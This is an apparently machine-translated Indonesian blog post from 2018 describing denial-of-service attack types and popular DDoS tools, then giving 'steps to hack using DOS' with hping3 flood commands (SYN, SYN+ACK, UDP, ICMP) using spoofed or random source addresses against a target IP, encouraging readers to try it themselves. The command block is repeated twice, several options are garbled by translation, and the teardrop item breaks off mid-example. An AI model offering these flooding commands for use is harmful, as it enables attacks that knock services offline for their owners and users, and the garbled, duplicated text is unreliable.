Friday, October 19, 2018

Apa itu serangan DOS dan bagaimana cara meretas menggunakan DOS

DOS

Brother, Anda mungkin telah melihat Mr Robot dan ingat acara ketika Fsociety menggunakan DDoS sebagai kartu panggil untuk memancing Elliot agar membantu mereka menurunkan E-Corp atau Anda mungkin terpana dalam situasi ketika Anda mencoba membuka Situs Web hanya untuk lihat pemberitahuan bahwa Situs web sedang tidak aktif. Apa ini? Ya, ini adalah Serangan DOS.

Serangan penolakan layanan (DoS) adalah serangan yang menyumbat begitu banyak memori pada sistem target sehingga tidak dapat melayani pengguna itu, atau menyebabkan sistem target mogok, reboot, atau menolak layanan untuk pengguna yang sah. Ada beberapa jenis serangan dos seperti yang dibahas di bawah ini: -

1) Ping Of Death : - Ping of death attack mengirimkan ICMP datagrams yang terlalu besar (dienkapsulasi dalam paket IP) kepada korban. Perintah Ping memanfaatkan permintaan echo ICMP dan pesan balasan echo dan itu biasa digunakan untuk menentukan apakah remote host masih hidup. Dalam ping of death attack, bagaimanapun, ping menyebabkan sistem remote untuk hang, reboot atau crash. Untuk melakukannya, penyerang menggunakan, perintah ping bersama dengan argumen -l (digunakan untuk menentukan ukuran paket yang dikirim) ke ping sistem target yang melebihi byte maksimum yang diizinkan oleh TCP / IP (65.536).
contoh: - c: /> ping-l 65540 hostname
Untungnya, hampir semua sistem operasi saat ini tidak rentan terhadap ping of death attack.

2) Serangan Teardrop : - Setiap kali data dikirim melalui internet, itu dipecah menjadi fragmen pada sistem sumber dan dipasang kembali di sistem tujuan. Misalnya Anda perlu mengirim 3.000 byte data dari satu sistem ke sistem lainnya
3) SYN - Flood Attack: - Dalam serangan flooding SYN, beberapa paket SYN dikirim ke host target, semua dengan alamat IP sumber yang tidak valid. Ketika sistem target menerima paket SYN ini, ia mencoba untuk menanggapi masing-masing dengan paket SYN / ACK tetapi karena semua alamat IP sumber tidak valid, sistem target masuk ke status menunggu untuk pesan ACK untuk menerima dari sumber. Akhirnya, karena sejumlah besar permintaan koneksi, memori sistem target ' dikonsumsi. Untuk benar-benar mempengaruhi sistem target, sejumlah besar paket SYN dengan alamat IP yang tidak valid harus dikirim.

4) Land Attack : - Serangan darat mirip dengan serangan SYN, satu-satunya perbedaan adalah bahwa alih-alih memasukkan alamat IP yang tidak valid, paket SYN menyertakan alamat IP dari sistem target itu sendiri. Akibatnya loop tak terbatas dibuat dalam sistem target, yang akhirnya hang dan crash. Windows NT sebelum Paket Layanan 4 rentan terhadap serangan ini.

5) Smurf Attack : - Ada 3 pemain dalam serangan smurf - penyerang, perantara (yang juga bisa menjadi korban) dan korban. Dalam kebanyakan skenario penyerang spoofs alamat sumber IP sebagai IP dari korban yang dituju ke alamat broadcast jaringan perantara. Setiap host di jaringan perantara menjawab, membanjiri korban dan jaringan perantara dengan lalu lintas jaringan.
Hasil: - Kinerja dapat terdegradasi sedemikian rupa sehingga korban, korban dan jaringan perantara menjadi tersumbat dan tidak dapat digunakan, yaitu menyumbat jaringan dan mencegah pengguna yang sah dari mendapatkan layanan jaringan.

Serangan DOS

6) UDP - Flood Attack : - Dua layanan UDP: echo (yang menggemakan kembali karakter apa pun yang diterima) dan chargen (yang menghasilkan karakter) digunakan di masa lalu untuk pengujian jaringan dan diaktifkan secara default pada kebanyakan sistem. Layanan ini dapat digunakan untuk meluncurkan serangan DOS dengan menghubungkan chargen ke port echo pada mesin yang sama atau yang lain dan menghasilkan sejumlah besar lalu lintas jaringan .

Distributed Denial Of Service (DDoS):  


Dalam serangan DoS Terdistribusi, ada 100 atau lebih penyerang yang berbeda (sistem) yang menyerang sistem tunggal. Karena jumlah serangan penyerang yang lebih tinggi, serangan DDoS lebih efektif dan berbahaya daripada serangan DoS biasa. Para penyerang memiliki kontrol atas zombie utama, yang, pada gilirannya, memiliki kendali atas zombie budak, seperti yang ditunjukkan pada gambar.

Tidak ada sistem yang terhubung ke internet yang aman dari serangan DDoS. Semua platform, termasuk Unix dan Windows NT, rentan terhadap serangan semacam itu. Bahkan mesin Mac OS telah digunakan untuk melakukan serangan DDoS.

Alat bantu DDoS dan dos yang paling populer adalah: -

a) Trin00 (WinTrinoo) 
b) Jaringan Banjir Suku (TFN) (TFN2k) 
c) Shaft 
d) LOIC (LOW ORBIT ION CANNON) 
e) XOIC

Tidak ada perangkat lunak, Anda ingin mencobanya sendiri, Anda dapat menggunakan HPING (sudah terinstal di KALI LINUX).

ATAU

Unduh hping dari www. hping .org

Langkah-langkah untuk meretas menggunakan serangan DOS:


Buka konsol dan pergi ke jalur hping3 dan berikan perintah berikut.

hping3 –mer-source –S –L 0 –p <target port> <target IP>

Di sini kami mengirim paket SYN (nilai set dengan mengganti 0) dengan sumber acak.

hping3 –mer-source –SA –p <buka port> <target IP>

Di sini kami mengirimkan paket SYN + ACK dari sumber acak.

hping3 –mer-source -–udp <target IP> –flood

Membanjiri IP sasaran dengan paket UDP.

hping3 –mer-source –SAFRU –L 0 –M 0 –p <port> <target> –flood

Dalam perintah ini, kami mengirimkan paket SYN + ACK + FIN + RST + URG dengan TCP ack (-L) dan TCP seq (-M). Ubah nilai setelah -L dan -M.

hping3 –icmp –spoof –flood

Banjir dengan paket ICMP oleh IP spoofed (–spoof).

Buka konsol dan pergi ke jalur hping3 dan berikan perintah berikut.

hping3 –mer-source –S –L 0 –p <target port> <target IP>

Di sini kami mengirim paket SYN (nilai set dengan mengganti 0) dengan sumber acak.

hping3 –mer-source –SA –p <buka port> <target IP>

Di sini kami mengirimkan paket SYN + ACK dari sumber acak.

hping3 –mer-source -–udp <target IP> –flood

Membanjiri IP sasaran dengan paket UDP.

hping3 –mer-source –SAFRU –L 0 –M 0 –p <port> <target> –flood

Dalam perintah ini, kami mengirimkan paket SYN + ACK + FIN + RST + URG dengan TCP ack (-L) dan TCP seq (-M). Ubah nilai setelah -L dan -M.

hping3 –icmp –spoof –flood

Banjir dengan paket ICMP oleh IP spoofed (–spoof).

No comments:

Post a Comment